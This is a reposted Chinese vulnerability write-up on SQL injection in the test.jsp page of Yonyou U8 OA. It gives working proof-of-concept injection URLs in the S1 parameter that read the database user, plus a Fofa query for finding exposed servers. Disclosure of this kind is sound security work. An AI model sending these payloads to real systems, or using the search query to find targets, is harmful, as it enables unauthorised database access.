用友U8 OA test.jsp SQL注入

admin 2023年4月8日18:23:51评论93 views字数 426阅读1分25秒阅读模式

影响范围

用友U8 OA

漏洞类型

SQL注入

利用条件

影响范围

漏洞概述

用友U8 OA test.jsp文件存在SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞

漏洞复现

登录页面如下

用友U8 OA test.jsp SQL注入

http://x.x.x.x:8081/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))http://x.x.x.x:8081/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(user()))

用友U8 OA test.jsp SQL注入

用友U8 OA test.jsp SQL注入

或者直接查询user也可以:

http://x.x.x.x:8081/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20user())

用友U8 OA test.jsp SQL注入

漏洞检索

Fofa:

app="用友U8+OA基础版"

用友U8 OA test.jsp SQL注入

安全建议

升级到最新版本~

用友U8 OA test.jsp SQL注入

原文始发于微信公众号(七芒星实验室):用友U8 OA test.jsp SQL注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月8日18:23:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友U8 OA test.jsp SQL注入https://cn-sec.com/archives/1661066.html

发表评论

匿名网友 填写信息